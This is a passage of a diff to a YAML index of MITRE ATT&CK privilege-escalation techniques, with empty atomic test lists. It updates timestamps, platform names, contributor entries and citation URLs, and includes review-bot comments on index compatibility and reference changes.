- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
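Review bot: the platform list rewrite here (`Azure AD`, `Office 365` and `Google Workspace` removed; `Office Suite` and `Identity Provider` added; version bumped to 2.7) changes the keys that platform-filtered views of T1078 are built on, and the same Office 365 to Office Suite substitution recurs for T1546 and T1098.002 below; check that any index or matrix generated per platform uses the new names, otherwise these techniques silently drop out of the old platform indexes. Also note `x_mitre_modified_by_ref` is deleted in this hunk and only re-added in the next one, so the two hunks must land together.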
@@ -20994,11 +21300,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
@@ -21066,23 +21373,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
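Review bot: the Leitch Hollowing reference swaps `http://www.autosectools.com/process-hollowing.pdf` for a copy hosted at `https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf`, with the retrieval date moved to September 12, 2024; since this is a third-party mirror rather than the original publisher, it is worth confirming the PDF is the same document before the citation URL changes, and the PR description should call out the reference update because it is the only citation change in this hunk.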
@@ -21145,11 +21451,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -21202,8 +21507,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -21251,78 +21556,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21370,6 +21608,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -21380,9 +21622,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -21391,8 +21637,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
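Review bot: this hunk re-emits, under a different key order, the T1546.004 `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors` and `external_references` that the earlier hunk for the same technique deleted, so the net content change is small: `revoked: false` is new, `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0, and the `bencane blog bashrc` URL now points at a web.archive.org snapshot with a September 25, 2024 retrieval date. Diff tools render this as a large rewrite, so spelling out those three real changes in the commit message would make review of later regenerations easier.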
@@ -21438,7 +21743,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21463,13 +21768,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21549,7 +21852,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -21585,7 +21887,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21608,12 +21910,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -21691,12 +21992,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -21757,7 +22057,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -21801,7 +22100,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -21823,7 +22122,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -21904,7 +22202,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -21927,7 +22224,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -21957,12 +22254,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22047,7 +22342,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -22112,7 +22406,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -22187,7 +22480,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22215,7 +22508,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -22246,7 +22538,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22289,12 +22581,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22311,7 +22601,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
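Review bot: the contributor rename here flips to surname-first (`Alexander Rodchenko` becomes `Rodchenko Aleksandr`) while the T1078 hunk above normalises the other way (`Goldstein Menachem` becomes `Menachem Goldstein`); if both come verbatim from the upstream ATT&CK contributor fields they can stay, otherwise one convention should be used across the file.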
@@ -22370,7 +22660,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -22452,12 +22741,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22554,7 +22842,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -22668,7 +22955,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -22738,7 +23024,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -22766,7 +23051,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22810,8 +23095,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -22847,7 +23130,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -22866,12 +23149,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -22921,12 +23203,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -22959,9 +23240,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
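Review bot: the combined contributor entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into `Nilesh Dherange (Gurucul)` and `Naveen Vijayaraghavan`, and the Gurucul affiliation now attaches only to the first of the two. If both contributors were from Gurucul, the second entry lost its affiliation in the split; confirm against the upstream contributor list before merging.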
@@ -22978,9 +23260,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
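Review bot: `Office 365` and `Google Workspace` are replaced by a single `Office Suite` platform for T1098.002 (with the version bump to 2.2), and the same consolidation appears for T1484 and T1078.004 further down, where `Azure AD` becomes `Identity Provider`. Any per-platform index that is keyed on the old platform strings will no longer pick these techniques up; check that those indexes are regenerated or renamed alongside this change.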
@@ -23026,38 +23307,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
